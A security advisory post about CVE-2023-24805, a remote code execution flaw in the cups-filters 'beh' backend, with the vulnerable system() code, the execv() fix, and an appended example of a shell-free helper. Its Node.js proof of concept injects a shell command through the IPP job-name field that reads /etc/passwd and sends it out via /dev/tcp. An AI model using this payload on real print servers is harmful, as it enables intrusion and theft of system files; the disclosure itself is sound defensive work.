Date: Wed, 17 May 2023 11:30:11 +0200
From: Till Kamppeter <>
Subject: CVE-2023-24805: RCE in cups-filters, beh CUPS backend

The following bug was reported to OpenPrinting's GitHub, repo cups-filters,
as a private (security) issue report:


If you use "beh" to create an accessible network printer, this security 
vulnerability can cause remote code execution.



Line 288 in 5c9498a:

    retval = system(cmdline) >> 8;

    // context: argv = beh <job-id> <user> <title> <copies> <options>
    snprintf(cmdline, sizeof(cmdline),
             "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
             cups_serverbin, scheme, argv[1], argv[2], argv[3],
             (argc == 6 ? "1" : argv[4]),
             argv[5], filename);
    retval = system(cmdline) >> 8;

The system function will be called here to execute the command, and the
user and title parameters are user-controlled and unsanitized.


      start a beh service lpadmin -p myprinter -E -v 

      exploit: //

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);

doc.pipe(concat(function (data) {
var printer = ipp.Printer("");
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > 
${PWD}dev${PWD}tcp${PWD}${PWD}1337\";'' #.pdf",
"document-format": "application/pdf"
        "media-col": {
          "media-source": "tray-2"
, data: data
printer.execute("Print-Job", msg, function(err, res){

The report got assigned CVE-2023-24805.

A fix is to use execv() instead of system() and was proposed as a pull 
request attached to the bug report.

The pull request is merged now into (branch "master")

as commit

and the fix is also ported to the "1.x" branch of cups-filters, as commit

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.
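
The execv() approach named above, as an added example (not the cups-filters patch and not code from this message): the job fields travel as separate argv[] entries, so no shell ever parses them. The helper names, the constructed title and the use of /bin/echo as a stand-in backend are assumptions of this example.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Run prog via fork()/execv() with no shell in between and capture its stdout.
 * Returns the child's exit status (what system() >> 8 yields), -1 on error. */
static int run_no_shell(const char *prog, char *const argv[],
                        char *out, size_t outlen)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;
    if (outlen == 0 || pipe(fds) < 0)
        return -1;
    if ((pid = fork()) < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                   /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execv(prog, argv);            /* argv[] entries reach the program verbatim */
        _exit(127);                   /* reached only if execv() failed */
    }
    close(fds[1]);
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Constructed job title: in the '%s' slot of the snprintf() format its quote
 * and ';' would end the quoted argument and start a second shell command. */
#define HOSTILE_TITLE "x'; echo INJECTED; '"

/* Returns 1 if the stand-in backend (/bin/echo) got the title as one argument. */
static int title_passed_verbatim(void)
{
    char out[128];
    char *argv[] = { "echo", HOSTILE_TITLE, NULL };
    return run_no_shell("/bin/echo", argv, out, sizeof(out)) == 0 &&
           strcmp(out, HOSTILE_TITLE "\n") == 0;
}

int main(void) { return title_passed_verbatim() ? 0 : 1; }
```

The program exits 0 when the title comes back byte for byte, which is the property the system() call could not provide.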

